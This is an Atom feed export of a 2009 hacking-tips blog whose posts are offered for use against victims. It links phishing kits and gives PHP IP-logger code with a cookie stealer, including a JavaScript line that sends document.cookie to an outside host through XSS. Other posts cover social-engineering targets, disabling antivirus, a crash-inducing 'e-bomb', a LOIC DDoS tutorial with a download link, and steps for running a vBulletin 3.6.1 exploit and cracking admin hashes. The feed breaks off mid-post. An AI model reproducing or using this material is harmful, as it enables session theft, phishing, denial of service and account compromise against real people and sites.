<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-490879771157898023</id><updated>2011-11-27T16:06:07.140-08:00</updated><category term='web application'/><category term='hack'/><category term='DDoS'/><category term='proxy'/><category term='Top Tools'/><category term='SQL'/><category term='XP'/><category term='surfing'/><category term='Premium accounts'/><category term='tips and tricks'/><category term='wordlists'/><category term='Bootable'/><category term='Shortcuts'/><category term='rapidshare'/><category term='Friendster'/><category term='USB'/><category term='codes'/><category term='spoofing'/><category term='PHP'/><category term='password cracking'/><category term='anonymous'/><category term='phishing'/><category term='Learning'/><category term='upload download'/><category term='tutorials'/><category term='Administrator'/><category term='downloadable'/><category term='sniffer'/><category term='Scanner'/><category term='Torrent'/><category term='IP'/><category term='Putty'/><category term='email'/><category term='Money'/><category term='bypass'/><category term='TCP flooder'/><category term='hack tools'/><category term='google'/><title type='text'>Holly Donuts</title><subtitle type='html'>All Favourites from All websites</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>66</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-1383566366246034845</id><published>2009-01-03T19:57:00.000-08:00</published><updated>2009-01-03T20:42:59.327-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='phishing'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>Phisher download</title><content type='html'>Other Phishing Links, You can download it easily.&lt;br /&gt;&lt;a href="http://www.4shared.com/file/56357454/d47ae4cc/Phisher_Maker.html"&gt;http://www.4shared.com/file/56357454/d47ae4cc/Phisher_Maker.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.4shared.com/file/72556629/3e817dce/Automatic_RapidShare_Phisher_Setup.html"&gt;http://www.4shared.com/file/72556629/3e817dce/Automatic_RapidShare_Phisher_Setup.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.4shared.com/file/65254674/83463315/Yahoo_Phisher.html"&gt;http://www.4shared.com/file/65254674/83463315/Yahoo_Phisher.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.4shared.com/file/56357966/19814570/Great_Site_Phishers.html"&gt;http://www.4shared.com/file/56357966/19814570/Great_Site_Phishers.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.4shared.com/file/77678911/5e989858/Phisher-Help.html"&gt;http://www.4shared.com/file/77678911/5e989858/Phisher-Help.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-1383566366246034845?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/1383566366246034845/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/phisher-download.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1383566366246034845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1383566366246034845'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/phisher-download.html' title='Phisher download'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-8811446666679309526</id><published>2009-01-03T07:10:00.000-08:00</published><updated>2009-01-03T07:12:09.548-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorials'/><title type='text'>Ways to get an IP address</title><content type='html'>Ways to get an IP address (tut with pics)&lt;br /&gt;Ok after the whole TRH situation alot of my tutorials got deleted..which I'm pissed about...&lt;br /&gt;&lt;br /&gt;But nothing I can do...&lt;br /&gt;&lt;br /&gt;So first is the easiest...&lt;br /&gt;&lt;br /&gt;=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&lt;br /&gt;&lt;br /&gt;Get an IP way:&lt;br /&gt;1.&lt;br /&gt;&lt;br /&gt;Description: Make a fake server(well a real one but still) and put a simple IP logger in php for the index...&lt;br /&gt;&lt;br /&gt;You will need: Notepad(or a simple text editor), a brain, and a php server&lt;br /&gt;&lt;br /&gt;Where to get supplies: Mostlikely on your computer already, you should have one already, register for one at http://phpnet.us&lt;br /&gt;&lt;br /&gt;Ok here is a simple IP logger&lt;br /&gt;Code:&lt;br /&gt;&lt;?php&lt;br /&gt;&lt;br /&gt;$ip = getenv(REMOTE_ADDR);&lt;br /&gt;$agent = getenv(HTTP_USER_AGENT);&lt;br /&gt;$refer = getenv(HTTP_REFERER);&lt;br /&gt;$date = date("l d F H:i:s");&lt;br /&gt;$fp = fopen("iplog.txt", "a");&lt;br /&gt;fputs($fp, "\nIP: $ip - User Info: $agent $refer DATE: $date\n\n");&lt;br /&gt;fwrite($fp, "====================================================\n\n");&lt;br /&gt;fclose($fp);&lt;br /&gt;&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;I personally prefer this way though (I coded this by hand you can take it if you want)&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;?php&lt;br /&gt;&lt;br /&gt;$cookie = $HTTP_GET_VARS["cookie"];&lt;br /&gt;$ip = getenv(REMOTE_ADDR);&lt;br /&gt;$agent = getenv(HTTP_USER_AGENT);&lt;br /&gt;$refer = getenv(HTTP_REFERER);&lt;br /&gt;$date = date("l d F H:i:s");&lt;br /&gt;if ($ip != "xx.xxx.xx.xxx") {&lt;br /&gt;$fp = fopen("iplog.txt", "a");&lt;br /&gt;fwrite($fp, $cookie . "\n\n");&lt;br /&gt;fputs($fp, "\nIP: $ip - User Info: $agent $refer DATE: $date\n\n");&lt;br /&gt;fwrite($fp, "====================================================\n\n");&lt;br /&gt;fclose($fp);&lt;br /&gt;}&lt;br /&gt;echo "Sorry server down... Come back later  =]";&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;&lt;br /&gt;METHODS&lt;br /&gt;&lt;br /&gt;&lt;script language="JavaScript"&gt;&lt;br /&gt;document.location="http://d1c.phpnet.us/index.php?cookie=" + document.cookie;&lt;br /&gt;&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;OR&lt;br /&gt;&lt;br /&gt;"javascript:document.location='http://d1c.phpnet.us/index.php?cookie='+document.cookie;"&lt;br /&gt;&lt;br /&gt;*/&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;But what you do it replace xx.xxx.xx.xxx with your IP so you don't accidentally log yourself and if someone stumbles on it it wont show your IP&lt;br /&gt;&lt;br /&gt;It is also a cookie steal which can be implemented through javascript, xxs, and yeah...(The methods are in the code in comments)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Get an IP way:&lt;br /&gt;2.&lt;br /&gt;&lt;br /&gt;Description: Make a fake server(well a real one but still) and put a jpeg headers in it and put it on websites...&lt;br /&gt;&lt;br /&gt;You will need: Notepad(or a simple text editor), a brain, and a php server&lt;br /&gt;&lt;br /&gt;Where to get supplies: Mostlikely on your computer already, you should have one already, register for one at http://phpnet.us&lt;br /&gt;&lt;br /&gt;Ok to do this on it is the same as above but with this you can put it on myspaces... forums and anything that allows for remote pictures...&lt;br /&gt;&lt;br /&gt;First you need the code...&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;?php&lt;br /&gt;&lt;br /&gt;$ip = getenv(REMOTE_ADDR);&lt;br /&gt;&lt;br /&gt;$agent = getenv(HTTP_USER_AGENT);&lt;br /&gt;&lt;br /&gt;$refer = getenv(HTTP_REFERER);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$date = date("l d F H:i:s");&lt;br /&gt;&lt;br /&gt;$fp = fopen("iplog&lt;br /&gt;&lt;br /&gt;.txt", "a");&lt;br /&gt;&lt;br /&gt;fputs($fp, "IP: $ip - User Info: $agent $refer DATE: $date\n\n");&lt;br /&gt;&lt;br /&gt;fclose($fp);&lt;br /&gt;&lt;br /&gt;$img_number = imagecreate(10,10);&lt;br /&gt;&lt;br /&gt;$backcolor = imagecolorallocate($img_number,0,0,0);&lt;br /&gt;&lt;br /&gt;$textcolor = imagecolorallocate($img_number,0,0,0);&lt;br /&gt;&lt;br /&gt;imagefill($img_number,0,0,$backcolor);&lt;br /&gt;&lt;br /&gt;$number  = "Oh Hia";&lt;br /&gt;&lt;br /&gt;Imagestring($img_number,10,5,5,$number,$textcolor);&lt;br /&gt;&lt;br /&gt;header("Content-type:  image/jpeg");&lt;br /&gt;&lt;br /&gt;imagejpeg($img_number);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;now basically this will just appear as a box.. like this one...&lt;br /&gt;&lt;br /&gt;[Image: image.php]&lt;br /&gt;&lt;br /&gt;and to use it just treat it like an image file&lt;br /&gt;&lt;br /&gt;Example&lt;br /&gt;Code:&lt;br /&gt;&lt;img src="http://d1c.phpnet.us/image.php"&gt;&lt;br /&gt;&lt;br /&gt;Well this is all I can do for this tutorial right now... but I will add on to it...(Leaving)&lt;br /&gt;&lt;br /&gt;I will finish it tonight if I'm not busy... Enjoy&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;NEW ADDITION!!!&lt;br /&gt;=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&lt;br /&gt;&lt;br /&gt;Get an IP way:&lt;br /&gt;3.&lt;br /&gt;&lt;br /&gt;Description: Grab headers from Yahoo email&lt;br /&gt;&lt;br /&gt;You will need: A yahoo email account, the internets(or a series of tubes), and a brain&lt;br /&gt;&lt;br /&gt;Where to get supplies: http://Yahoo.com, buy an ISP...I have no idea how you are reading this if you don't, and you should have on by default...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ok for starters you need to social engineer your victim to send you an email...&lt;br /&gt;&lt;br /&gt;Example;&lt;br /&gt;Code:&lt;br /&gt;"Hey John Doe,&lt;br /&gt;&lt;br /&gt;I just got this new email account can you send me a message is is kind of acting up...&lt;br /&gt;&lt;br /&gt;Ok once you get the email... Open it...&lt;br /&gt;Now on the bottom left you will see...&lt;br /&gt;&lt;br /&gt;[Image: 1-5.jpg]&lt;br /&gt;&lt;br /&gt;Click on view headers...&lt;br /&gt;::: NOTE :::&lt;br /&gt;To view headers you need to be in classic mode&lt;br /&gt;[thanks Right_Hand_Man2]&lt;br /&gt;::::::&lt;br /&gt;&lt;br /&gt;and at the top of the page you should see...&lt;br /&gt;&lt;br /&gt;[Image: 3-6.jpg]&lt;br /&gt;&lt;br /&gt;You're Victim's IP will be in the 'Received' Row&lt;br /&gt;&lt;br /&gt;Really simple I don't know how well this will work on other email clients... If it does feel free to post about it...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;NEW ADDITION!!!&lt;br /&gt;=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&lt;br /&gt;&lt;br /&gt;Get an IP way:&lt;br /&gt;4.&lt;br /&gt;&lt;br /&gt;Description: Grab IPs through IM's&lt;br /&gt;&lt;br /&gt;You will need: An Instant messaging Client, brain, and WPE Pro&lt;br /&gt;&lt;br /&gt;Where to get supplies: http://www.pidgin.im/ (Universal IM client Liniux and Windows), You should have it by default, http://wpepro.net/index.php?categoryid=9&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ok here is the basics of WPE Pro (Tutorial stolen from http://wpepro.net/forums/index.php?showtopic=145)&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;WPE PRO MFC Application - Winsock Packet Editor Pro 0.9a&lt;br /&gt;&lt;br /&gt;This is a TCP/IP Packet Sniffer *With Virus Capabilities Mistaken For A Trojan*&lt;br /&gt;&lt;br /&gt;1. Disable Anti-Virus (Because these days security can detect Wpe)&lt;br /&gt;2. Open WPE PRO.exe (WpeSpy.dll Must be in same folder)&lt;br /&gt;3. Target The Process You Wish To Hack/Sniff.&lt;br /&gt;&lt;br /&gt;In Most Cases:&lt;br /&gt;Iexplore.exe&lt;br /&gt;Firefox.exe&lt;br /&gt;Or Game Process.&lt;br /&gt;&lt;br /&gt;Make filters if needed, I rarely use them.&lt;br /&gt;Press the Record button (Looks like this for those who cant see whatâ€™s n front of them Its a black arrow top left)&lt;br /&gt;Stop when the event you are waiting for happens.&lt;br /&gt;&lt;br /&gt;Look through the bottom packets that appear until you find what you need. (also look through them all, because you might find something you would find to come in handy later.)&lt;br /&gt;&lt;br /&gt;Right click to see a menu appear.&lt;br /&gt;Send: A new window will appear allowing you to see the IP of the server your connected to.&lt;br /&gt;And will also allow you to view the port and edit &amp; send the packet again.&lt;br /&gt;&lt;br /&gt;Add to send list: Ads the packet to the send list, To view this list go to bottom left hand corner &amp; click the tab "Filter/Send" (send)&lt;br /&gt;In hear you can also save packets &amp; open previously saved packets.&lt;br /&gt;&lt;br /&gt;Set send list with socket id: This speaks for its self, It adds the port that the packet was received from.&lt;br /&gt;This way you can send saved packets in the send list, Without having to add a port manually.&lt;br /&gt;&lt;br /&gt;Thatâ€™s all for this beginner tutorial have fun.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;WPE Files After Ending Process:&lt;br /&gt;C:\Documents and Settings\%User%\Cookies\%User%@wpepro[1]&lt;br /&gt;C:\Documents and Settings\%User%\Recent\WPE PRO *Shorcut to* C:\WINDOWS\WPE PRO.INI&lt;br /&gt;C:\WINDOWS\Prefetch\WPE PRO.EXE-2CA09F82.pf&lt;br /&gt;&lt;br /&gt;Also makes a folder called $R something a long name and makes a copy of its self and the .dll&lt;br /&gt;And also in: C:\System Volume Information\&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;C:\system Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP27\A0012559.exe&lt;br /&gt;Trojan horse Generic2.MBC&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ok so that was the basics...&lt;br /&gt;&lt;br /&gt;but here is a video on how to use it to grab IM IPs...&lt;br /&gt;&lt;br /&gt;http://www.youtube.com/results?search_qu...wpe+pro+tu&lt;br /&gt;(Most of the videos should help)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Get an IP way:&lt;br /&gt;5.&lt;br /&gt;&lt;br /&gt;Description: Grab IPs through IM's&lt;br /&gt;&lt;br /&gt;You will need: pidgin, brain&lt;br /&gt;&lt;br /&gt;Where to get supplies: http://www.pidgin.im/ (Universal IM client Liniux and Windows), You should have it by default&lt;br /&gt;&lt;br /&gt;Ok this one is pretty simple...&lt;br /&gt;&lt;br /&gt;With everything pidgin sends a file through an IM client..it Direct connects and displays the receivers IP&lt;br /&gt;&lt;br /&gt;Yeah..not that complicated it even does it with image sharing haha...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Get an IP way:&lt;br /&gt;6.&lt;br /&gt;&lt;br /&gt;Description: Grab IPs through IM's&lt;br /&gt;&lt;br /&gt;You will need: An Instant messaging Client, brain, and command prompt&lt;br /&gt;&lt;br /&gt;Where to get supplies: http://www.pidgin.im/ (Universal IM client Liniux and Windows) Or MSN, You should have it by default&lt;br /&gt;&lt;br /&gt;Watch this video...&lt;br /&gt;&lt;br /&gt;http://www.youtube.com/watch?v=jgjeujCEyJU&lt;br /&gt;&lt;br /&gt;Easy...&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;netstat -a&lt;br /&gt;&lt;br /&gt;OR&lt;br /&gt;&lt;br /&gt;netstat&lt;br /&gt;&lt;br /&gt;There are alot of netstat versions..which ever you like better&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-8811446666679309526?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/8811446666679309526/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/ways-to-get-ip-address.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/8811446666679309526'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/8811446666679309526'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/ways-to-get-ip-address.html' title='Ways to get an IP address'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-4453687645792449850</id><published>2009-01-03T06:32:00.000-08:00</published><updated>2009-01-03T06:33:27.192-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorials'/><category scheme='http://www.blogger.com/atom/ns#' term='email'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Making a E-BOMB</title><content type='html'>I will tell you how to make a e-bomb....&lt;br /&gt;An e-bomb is a program that opens windows again and again until the victims comp. crashes....&lt;br /&gt;&lt;br /&gt;Open notepad.&lt;br /&gt;then type the following.&lt;br /&gt;&lt;br /&gt;open bomb.exe&lt;br /&gt;&lt;br /&gt;then save it as bomb.bat&lt;br /&gt;then download this&lt;br /&gt;&lt;br /&gt;http://www.abyssmedia.com/downloads/quickbfc.exe&lt;br /&gt;&lt;br /&gt;then convert the bomb.bat file into a exe&lt;br /&gt;&lt;br /&gt;That is your e-bomb.... &lt;br /&gt;Enjoy!!!!!!!!!! [but dont open it]!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-4453687645792449850?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/4453687645792449850/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/making-e-bomb.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4453687645792449850'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4453687645792449850'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/making-e-bomb.html' title='Making a E-BOMB'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-5856506315277380793</id><published>2009-01-03T06:24:00.002-08:00</published><updated>2009-01-03T06:29:36.941-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorials'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>How to hide files in a jpg</title><content type='html'>Set up:&lt;br /&gt;1. Must have a .zip or .rar compressor.&lt;br /&gt;2. Willingness to learn.&lt;br /&gt;&lt;br /&gt;Steps:&lt;br /&gt;1. Save the picture of choice to your desktop.&lt;br /&gt;2. Make a new .rar or .zip folder on your desktop.&lt;br /&gt;3. Add the files you want to hide into the .zip or .rar&lt;br /&gt;4. Click start menu, run, cmd.&lt;br /&gt;5. In Command Prompt type cd "desktop" with the quotation marks.&lt;br /&gt;6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg&lt;br /&gt;( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)&lt;br /&gt;7. Now there should be the outputed file name with a .jpg extension on the desktop.&lt;br /&gt;( Do not close Command Prompt just yet )&lt;br /&gt;8. Double click it to open the picture and check it out.&lt;br /&gt;9. When your done looking, and want to view the hidden files&lt;br /&gt;Type: ren outputfilename.jpg outputfilename.rar or zip&lt;br /&gt;Now you're done!&lt;br /&gt;A quick info-fact:&lt;br /&gt;With this technique of hiding files in a jpg you can send this to anyone and they just have to rename the file extension to .zip or .rar.&lt;br /&gt;With this technique the Al-Qaeda operatives were able to send info to others secretively.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-5856506315277380793?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/5856506315277380793/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/how-to-hide-files-in-jpg.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5856506315277380793'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5856506315277380793'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/how-to-hide-files-in-jpg.html' title='How to hide files in a jpg'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-2005422833280221648</id><published>2009-01-03T06:24:00.001-08:00</published><updated>2009-01-03T06:24:49.484-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DDoS'/><category scheme='http://www.blogger.com/atom/ns#' term='tutorials'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Taking Down A Website with DDoS</title><content type='html'>Taking Down A Website:)..&lt;br /&gt;i was searching around the web the other day.. and i found this:&lt;br /&gt;Taking Down Websites&lt;br /&gt;In this tutorial I will show you how to take down websites via DDoS. For this tutorial we will be using one of the most effective and one of the least known tools called "Low Orbit Ion Cannon". Created by Anonymous members from 4chan.org, this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, Myspace,Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.&lt;br /&gt;&lt;br /&gt;Prerequisites: Download LOIC (Low Orbit Ion Cannon). Open up LOIC.&lt;br /&gt;&lt;br /&gt;Step 1: Type the target URL in the URL box.&lt;br /&gt;&lt;br /&gt;Step 2: Click lock on.&lt;br /&gt;&lt;br /&gt;Step 3: Change the threads to 9001 for maximum efficiency.&lt;br /&gt;&lt;br /&gt;Step 4: Click the big button "IMMA FIRIN MAH LAZAR!"&lt;br /&gt;&lt;br /&gt;Feel free to tweak around with these settings and play around with the program to get the best performance. Then minimize and go do whatever you need to do, the program will take care of the rest!&lt;br /&gt;&lt;br /&gt;DOWNLOAD HERE http://rapidshare.com/files/104926676/LOIC.exe&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-2005422833280221648?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/2005422833280221648/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/taking-down-website-with-ddos.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/2005422833280221648'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/2005422833280221648'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/taking-down-website-with-ddos.html' title='Taking Down A Website with DDoS'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-7927363971061108390</id><published>2009-01-03T06:05:00.001-08:00</published><updated>2009-01-03T06:07:27.918-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorials'/><title type='text'>Hacking Vbulletin Forums Version 3.6.1</title><content type='html'>Hacking Vbulletin Forums Version 3.6.1 - [TUTORIAL!]&lt;br /&gt;Hello everyone, Salazarr here. Today i will teach you how to hack a Vbulletin forum, Version 3.6.1.&lt;br /&gt;&lt;br /&gt;-1) Start off with downloading Active Perl: http://www.activestate.com/store/downloa...d58c2648ca&lt;br /&gt;&lt;br /&gt;2) Here, Is the exploit, remember to open it in notepad, and save it as: whatever.pl - basicly, whatever you want the name to be .pl&lt;br /&gt;Also Remember to change the text document, to all files. One last thing, save it in C:\perl\bin&lt;br /&gt;&lt;br /&gt;3) Here is the actual exploit: http://www.plunder.com/Vbulletin-3-6-1-E...157464.htm&lt;br /&gt;&lt;br /&gt;4) Now go find your victim, google: "Powered by Vbulletin 3.6.1"&lt;br /&gt;- You should see a bunch!&lt;br /&gt;&lt;br /&gt;5) open cmd, and type: cd c:\perl\bin&lt;br /&gt;this opens perl from cmd&lt;br /&gt;&lt;br /&gt;6) now type: yourexploitname.pl&lt;br /&gt;this will open the exploit from cmd&lt;br /&gt;&lt;br /&gt;7) next type: yourexploirname.pl your victims forum.com / (id number)&lt;br /&gt;&lt;br /&gt;8) you should see the hash but here i will explain how you can find the id number, first go to your victims forum, and click on view leaders, click on an admin, on top you should see: u=somerandomnumbers&lt;br /&gt;&lt;br /&gt;9) if you change the random number to 1 you should get the admin id.&lt;br /&gt;&lt;br /&gt;10) once you got the hash go to: http://www.passcracking.com - and insert the hash there, wait for a few days and you get the pass for the admin!&lt;br /&gt;from hackforums&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-7927363971061108390?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/7927363971061108390/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/hacking-vbulletin-forums-version-361_03.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/7927363971061108390'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/7927363971061108390'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/hacking-vbulletin-forums-version-361_03.html' title='Hacking Vbulletin Forums Version 3.6.1'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-5741830605598102710</id><published>2009-01-03T06:02:00.000-08:00</published><updated>2009-01-03T06:03:30.801-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorials'/><title type='text'>How to find out an IP address (using a webspace)</title><content type='html'>[TUT] How to find out an IP address (using a webspace)&lt;br /&gt;Hi,&lt;br /&gt;&lt;br /&gt;I want to show you how to create an IP Logger, using a webspace and a PHP-file.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Looking for a good webspace!&lt;br /&gt;At first you have to look for good webspaces. If you already have one, you can skip this part. You can buy a webspace or you can get a webspace free, too. Just use Google. If you have found a webspace, just register and login.&lt;br /&gt;&lt;br /&gt;2. Getting the PHP-file!&lt;br /&gt;It's easy. At first you have to open Notepad. Then you have to copy this&lt;br /&gt;in your file:&lt;br /&gt;&lt;br /&gt;    